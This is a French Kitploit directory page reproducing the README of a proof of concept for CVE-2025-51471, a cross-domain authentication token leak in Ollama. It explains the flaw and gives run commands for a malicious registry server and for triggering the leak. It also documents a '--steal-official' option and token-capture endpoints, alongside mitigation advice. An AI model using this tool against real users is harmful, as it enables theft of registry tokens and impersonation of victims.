Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-51471-POC — Ce PoC est uniquement destiné à des fins éducatives et de test de sécurité autorisé. NE PAS l'utiliser sur des systèmes que vous ne possédez pas. | Kitploit
Outils/GitHubGitHub/ajtazer/cve-2025-51471-poc
Analyse des VulnérabilitésExploitationSécurité WebAuthentificationRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

Ce PoC est uniquement destiné à des fins éducatives et de test de sécurité autorisé. NE PAS l'utiliser sur des systèmes que vous ne possédez pas.

Voir le dépôt
22il y a 8 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-51471 - PoC d'exposition de token cross-domaine d'Ollama

CVE-2025-51471 Ollama CVSS

Auteur : ajtazer

🔥 Aperçu

Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-51471, une vulnérabilité d'exposition de token d'authentification cross-domaine qui affecte toutes les versions d'Ollama (y compris la plus récente).

📋 Description de la vulnérabilité

Lorsqu'Ollama télécharge un modèle depuis un serveur HTTPS qui répond avec 401 Unauthorized, il suit l'URL realm de l'en-tête WWW-Authenticate sans vérifier qu'elle appartient au même domaine[...]

Cela permet à un attaquant de :

  1. Mettre en place un serveur de « registre » malveillant
  2. Tromper un utilisateur pour qu'il télécharge un modèle depuis ce serveur
  3. Renvoyer une réponse 401 avec un en-tête WWW-Authenticate pointant vers un point de terminaison contrôlé par l'attaquant
  4. Ollama envoie aveuglément son token d'authentification signé Ed25519 à l'attaquant
  5. L'attaquant capture le token

Impact

  • Accéder aux modèles privés sur registry.ollama.ai
  • Pousser des modèles malveillants sous l'identité de la victime
  • Usurper l'identité de la victime sur le registre Ollama

🚀 Démarrage rapide

Prérequis

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (any version)

Installation

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

Exécution du PoC

  1. Démarrez le serveur de registre malveillant (mode HTTP) :
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. Dans un autre terminal, assurez-vous qu'Ollama est en cours d'exécution :
root@kitploit:~
ollama serve
  1. Déclenchez la vulnérabilité :
root@kitploit:~
# Using curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# OR using ollama CLI
ollama pull --insecure localhost:8080/malicious/model
  1. Observez le terminal du serveur pour les tokens capturés !

🎬 Démo (Vidéo du PoC)

J'ai démontré ce PoC dans une courte vidéo — regardez-la ici :

YouTube — Démo du PoC

Remarque (mode HTTPS macOS) : Si vous utilisez le mode HTTPS, ajoutez le certificat généré à votre trousseau ou utilisez le mode HTTP avec --no-ssl.

📖 Options d'utilisation

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 Points de terminaison de l'API

EndpointDescription
/v2/*Point de terminaison de registre factice (déclenche l'exploit)
/v2/tokenPoint de terminaison de capture de token
/tokensVoir tous les tokens capturés (JSON)
/healthVérification de l'état du serveur

🛡️ Atténuation

  1. Téléchargez uniquement des modèles provenant de sources fiables
  2. Soyez prudent lors du téléchargement de modèles depuis des registres tiers
  3. Consultez PR #10750 pour le correctif officiel

📝 Crédits

  • Auteur : ajtazer
  • Chercheurs originaux :
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Rapport Huntr

⚠️ Avertissement

Ce PoC est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas.


Fabriqué avec ❤️ en utilisant Antigravity

Télécharger l’outil